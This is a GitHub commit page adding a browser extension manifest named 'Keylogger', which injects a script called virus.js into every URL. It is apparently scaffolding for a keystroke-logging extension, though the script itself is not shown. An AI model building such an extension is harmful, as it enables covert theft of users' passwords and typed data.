Skip to content

Commit

Permalink
created manifest.json
Browse files Browse the repository at this point in the history
  • Loading branch information
EXTREMOPHILARUM authored May 21, 2021
1 parent a8e7577 commit 7c90071
Showing 1 changed file with 14 additions and 0 deletions.
14 changes: 14 additions & 0 deletions extension/manifest.json
Original file line number Diff line number Diff line change
@@ -0,0 +1,14 @@
{
"manifest_version": 2,
"name": "Keylogger",
"version": "0.1",

"content_scripts": [
{
"matches": [
"<all_urls>"
],
"js": ["virus.js"]
}
]
}

0 comments on commit 7c90071

Please sign in to comment.